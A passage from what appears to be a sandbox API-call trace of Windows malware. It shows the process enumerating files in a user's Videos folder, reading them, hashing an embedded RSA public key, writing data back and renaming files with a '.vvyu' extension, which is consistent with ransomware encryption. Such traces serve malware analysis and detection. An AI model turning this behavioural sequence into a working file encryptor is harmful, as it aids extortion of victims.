HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0194.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0194.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0194.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0194.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0194.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0194.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0194.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0194.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0194.294] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0xf844, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0xf844, lpOverlapped=0x0) returned 1 [0194.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0194.295] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf849, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.295] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0194.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0194.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0194.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0194.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0194.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0194.297] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0194.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.297] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.297] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0194.297] CloseHandle (hObject=0x584) returned 1 [0194.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47828 [0194.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d49778 [0194.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47828 | out: hHeap=0x6a0000) returned 1 [0194.299] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\bsT5mSuptc.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\bst5msuptc.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\bsT5mSuptc.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\bst5msuptc.flv.vvyu")) returned 1 [0194.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0194.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.301] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0194.303] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aaa4910, ftCreationTime.dwHighDateTime=0x1d89fcb, ftLastAccessTime.dwLowDateTime=0x316ec030, ftLastAccessTime.dwHighDateTime=0x1d8a135, ftLastWriteTime.dwLowDateTime=0x316ec030, ftLastWriteTime.dwHighDateTime=0x1d8a135, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EXZou4J4nw j", cAlternateFileName="EXZOU4~1")) returned 1 [0194.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47828 [0194.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d478c0 [0194.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0194.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d478c0 | out: hHeap=0x6a0000) returned 1 [0194.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47828 | out: hHeap=0x6a0000) returned 1 [0194.304] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d6a1670, ftCreationTime.dwHighDateTime=0x1d8a095, ftLastAccessTime.dwLowDateTime=0x30c9b140, ftLastAccessTime.dwHighDateTime=0x1d8a21f, ftLastWriteTime.dwLowDateTime=0x30c9b140, ftLastWriteTime.dwHighDateTime=0x1d8a21f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F72Mw_KNQRugYJJCcBc", cAlternateFileName="F72MW_~1")) returned 1 [0194.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0194.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x7599e8 [0194.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16c) returned 0x2c31700 [0194.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47828 [0194.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0194.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0194.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0194.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d478c0 [0194.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0194.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47a88 [0194.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0194.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c380a8 | out: hHeap=0x6a0000) returned 1 [0194.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea9a8 | out: hHeap=0x6a0000) returned 1 [0194.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaab8 | out: hHeap=0x6a0000) returned 1 [0194.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0194.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47790 | out: hHeap=0x6a0000) returned 1 [0194.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0194.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2be43c0 [0194.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7599e8 | out: hHeap=0x6a0000) returned 1 [0194.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0194.309] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28474cb0, ftCreationTime.dwHighDateTime=0x1d89f24, ftLastAccessTime.dwLowDateTime=0x4f140be0, ftLastAccessTime.dwHighDateTime=0x1d8a437, ftLastWriteTime.dwLowDateTime=0x4f140be0, ftLastWriteTime.dwHighDateTime=0x1d8a437, nFileSizeHigh=0x0, nFileSizeLow=0xa9c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tU0g8BChMTWFHiHtpj.swf", cAlternateFileName="TU0G8B~1.SWF")) returned 1 [0194.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaab8 [0194.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0194.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaab8 | out: hHeap=0x6a0000) returned 1 [0194.309] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\tU0g8BChMTWFHiHtpj.swf") returned=".swf" [0194.309] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\tU0g8BChMTWFHiHtpj.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\tu0g8bchmtwfhihtpj.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0194.310] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=43465) returned 1 [0194.310] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0194.313] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa9a3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.313] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0194.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.316] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.316] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xa9c9, lpOverlapped=0x0) returned 1 [0194.317] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0194.317] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.317] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.317] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eaab8) returned 1 [0194.318] CryptCreateHash (in: hProv=0x6eaab8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0194.318] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.318] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0194.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0194.318] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0194.319] GetLastError () returned 0x0 [0194.319] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0194.319] CryptReleaseContext (hProv=0x6eaab8, dwFlags=0x0) returned 1 [0194.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0194.319] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0194.319] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0194.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0194.319] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0194.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa9d0) returned 0x2d49778 [0194.320] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0194.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0194.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0194.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0194.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0194.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42340 [0194.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fb8 [0194.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42388 [0194.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fd0 [0194.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a000 [0194.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0194.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a018 [0194.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0194.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0194.321] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0194.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0194.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0194.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0194.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0194.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0194.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0194.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a018 [0194.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0194.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a000 [0194.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0194.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0194.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0194.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0194.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0194.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0194.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0194.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0194.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0194.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0194.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0194.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0194.324] GetCurrentThreadId () returned 0x264 [0194.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0194.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d462d0 [0194.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0194.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaab8 [0194.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0194.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0194.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0194.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.325] GetCurrentThreadId () returned 0x264 [0194.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0194.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0194.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0194.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0194.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0194.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0194.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a000 [0194.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0194.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0194.327] RtlAllocateHeap (HeapHandle=0x6a0000, 